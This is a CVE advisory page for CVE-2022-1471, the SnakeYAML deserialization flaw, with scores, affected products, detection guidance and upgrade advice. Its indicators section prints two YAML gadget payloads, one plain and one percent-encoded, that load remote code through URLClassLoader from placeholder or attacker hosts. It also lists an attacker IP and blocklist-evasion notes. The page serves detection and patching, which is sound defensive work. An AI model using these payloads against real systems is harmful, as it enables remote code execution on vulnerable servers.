cbcvebase.
CVE-2022-1471
published 2022-12-01

CVE-2022-1471: SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker…

PriorityP183critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
99.61%
99.9th percentile
SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 and beyond.

Affected

4 ranges
VendorProductVersion rangeFixed in
apachesubmarine>= 0.7.0 < 0.8.00.8.0
apache_software_foundationapache_submarine>= 0.7.0 < 0.8.00.8.0
debiansnakeyaml
snakeyaml_projectsnakeyaml< 2.02.0

Detection & IOCsextracted from sources · hover to see the quote

command!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://your-server/yaml-payload.jar"]]]]
command!!javax.script.S%63riptEngin%65Manager [!!java.net.URLCl%61ssLoader [[!!java.net.URL ["http://attacker.example.com/"]]]]
urlhttp://3.137.187.148:1337/
ip3.137.187.148
port51337
pathsubmarine-server/server-core/src/main/java/org/apache/submarine/server/utils/YamlUtils.java
  • Detect CVE-2022-1471 exploitation attempts by monitoring HTTP request bodies for SnakeYAML deserialization gadget patterns, specifically the '!!' tag prefix combined with 'javax.script.ScriptEngineManager' or 'java.net.URLClassLoader' class instantiation strings.
  • Blocklist bypass via URL/percent-encoding of Java class names in YAML payloads (e.g., 'S%63riptEngin%65Manager', 'URLCl%61ssLoader') — detection rules must decode percent-encoded characters before matching against blocklists.
  • Monitor for outbound HTTP requests from application servers fetching remote JAR files (e.g., 'yaml-payload.jar') shortly after receiving YAML content-type POST requests, which indicates successful SnakeYAML RCE class-loading.
  • For Apache Submarine, monitor POST requests to YAML endpoints (application/yaml content-type) handled by YamlEntityProvider's readFrom method for deserialization gadget payloads.
  • For TorchServe (ShellTorch), chain detection: watch for model upload requests containing YAML files with SnakeYAML gadget tags, especially when the management interface is bound to 0.0.0.0 instead of localhost.
  • Identify vulnerable SnakeYAML versions (prior to 2.0) in software inventory and dependency scans; versions ≤ 1.30 are confirmed affected.
  • For Atlassian products, monitor the Assets Discovery agent communication port (default 51337) for unexpected traffic as a lateral indicator of CVE-2022-1471 exploitation attempts in Jira environments.
  • ·The exploit payload using percent-encoded class names (e.g., 'S%63riptEngin%65Manager') bypasses simple string-based blocklists; detection rules relying on plain-text keyword matching will miss URL-encoded variants.
  • ·CVE-2022-1471 affects SnakeYAML by default design — arbitrary Java class instantiation from untrusted YAML is enabled out of the box, meaning any application using SnakeYAML to parse untrusted input is potentially vulnerable regardless of application-level controls.
  • ·For TorchServe/ShellTorch, CVE-2022-1471 is most dangerous when chained with the unauthenticated management interface misconfiguration (bound to 0.0.0.0) and CVE-2023-43654 SSRF; standalone exploitation requires the ability to upload a model.
  • ·Apache Submarine fix replaces SnakeYAML with jackson-dataformat-yaml; cherry-picking PR #1054 and rebuilding the submarine-server image is the workaround for versions < 0.8.0 that cannot upgrade.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ghsa9.8CRITICAL
osv9.8CRITICAL
vendor_oracle9.8HIGH
vendor_debian8.3LOW
vendor_redhat8.3HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.